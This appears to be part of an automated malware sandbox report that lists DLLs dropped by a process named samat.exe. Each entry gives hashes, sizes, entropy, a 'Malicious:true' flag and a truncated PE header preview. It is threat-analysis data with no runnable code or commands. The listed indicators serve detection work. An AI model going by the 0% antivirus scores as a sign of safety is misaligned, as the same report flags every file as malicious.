                                                                                                                                                                                                                                                                                    SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                                                                    MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                                                                    SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                                                                    SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                                                                    SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):24576
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                                                                    MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                                                                                    SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                                                                                    SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                                                                                    SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12288
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                                                                                    MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                                                                                    SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
                                                                                                                                                                                                                                                                                    SHA-256:6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
                                                                                                                                                                                                                                                                                    SHA-512:617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12800
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.159963979391524
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
                                                                                                                                                                                                                                                                                    MD5:899895C0ED6830C4C9A3328CC7DF95B6
                                                                                                                                                                                                                                                                                    SHA1:C02F14EBDA8B631195068266BA20E03210ABEABC
                                                                                                                                                                                                                                                                                    SHA-256:18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
                                                                                                                                                                                                                                                                                    SHA-512:0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):14848
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.270418334522813
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
                                                                                                                                                                                                                                                                                    MD5:C4C525B081F8A0927091178F5F2EE103
                                                                                                                                                                                                                                                                                    SHA1:A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
                                                                                                                                                                                                                                                                                    SHA-256:4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
                                                                                                                                                                                                                                                                                    SHA-512:7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):56832
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.231032526864278
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
                                                                                                                                                                                                                                                                                    MD5:F9E266F763175B8F6FD4154275F8E2F0
                                                                                                                                                                                                                                                                                    SHA1:8BE457700D58356BC2FA7390940611709A0E5473
                                                                                                                                                                                                                                                                                    SHA-256:14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
                                                                                                                                                                                                                                                                                    SHA-512:EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):57344
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.252429732285762
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
                                                                                                                                                                                                                                                                                    MD5:DECF524B2D53FCD7D4FA726F00B3E5FC
                                                                                                                                                                                                                                                                                    SHA1:E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
                                                                                                                                                                                                                                                                                    SHA-256:58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
                                                                                                                                                                                                                                                                                    SHA-512:EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.690163963718492
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
                                                                                                                                                                                                                                                                                    MD5:80BB1E0E06ACAF03A0B1D4EF30D14BE7
                                                                                                                                                                                                                                                                                    SHA1:B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
                                                                                                                                                                                                                                                                                    SHA-256:5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
                                                                                                                                                                                                                                                                                    SHA-512:2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):22016
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1215844022564285
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
                                                                                                                                                                                                                                                                                    MD5:3727271FE04ECB6D5E49E936095E95BC
                                                                                                                                                                                                                                                                                    SHA1:46182698689A849A8C210A8BF571D5F574C6F5B1
                                                                                                                                                                                                                                                                                    SHA-256:3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
                                                                                                                                                                                                                                                                                    SHA-512:5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17920
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.293810509074883
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
                                                                                                                                                                                                                                                                                    MD5:78AEF441C9152A17DD4DC40C7CC9DF69
                                                                                                                                                                                                                                                                                    SHA1:6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
                                                                                                                                                                                                                                                                                    SHA-256:56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
                                                                                                                                                                                                                                                                                    SHA-512:27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11776
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862619033406922
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
                                                                                                                                                                                                                                                                                    MD5:19E0ABF76B274C12FF624A16713F4999
                                                                                                                                                                                                                                                                                    SHA1:A4B370F556B925F7126BF87F70263D1705C3A0DB
                                                                                                                                                                                                                                                                                    SHA-256:D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
                                                                                                                                                                                                                                                                                    SHA-512:D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):14336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227045547076371
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
                                                                                                                                                                                                                                                                                    MD5:309D6F6B0DD022EBD9214F445CAC7BB9
                                                                                                                                                                                                                                                                                    SHA1:ABD22690B7AD77782CFC0D2393D0C038E16070B0
                                                                                                                                                                                                                                                                                    SHA-256:4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
                                                                                                                                                                                                                                                                                    SHA-512:D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13824
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.176369829782773
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
                                                                                                                                                                                                                                                                                    MD5:D54FEB9A270B212B0CCB1937C660678A
                                                                                                                                                                                                                                                                                    SHA1:224259E5B684C7AC8D79464E51503D302390C5C9
                                                                                                                                                                                                                                                                                    SHA-256:032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
                                                                                                                                                                                                                                                                                    SHA-512:29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):14336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.047563322651927
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
                                                                                                                                                                                                                                                                                    MD5:52DCD4151A9177CF685BE4DF48EA9606
                                                                                                                                                                                                                                                                                    SHA1:F444A4A5CBAE9422B408420115F0D3FF973C9705
                                                                                                                                                                                                                                                                                    SHA-256:D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
                                                                                                                                                                                                                                                                                    SHA-512:64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13824
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.09893680790018
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
                                                                                                                                                                                                                                                                                    MD5:F929B1A3997427191E07CF52AC883054
                                                                                                                                                                                                                                                                                    SHA1:C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
                                                                                                                                                                                                                                                                                    SHA-256:5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
                                                                                                                                                                                                                                                                                    SHA-512:2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):15360
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.451865349855574
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
                                                                                                                                                                                                                                                                                    MD5:1FA5E257A85D16E916E9C22984412871
                                                                                                                                                                                                                                                                                    SHA1:1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
                                                                                                                                                                                                                                                                                    SHA-256:D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
                                                                                                                                                                                                                                                                                    SHA-512:E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
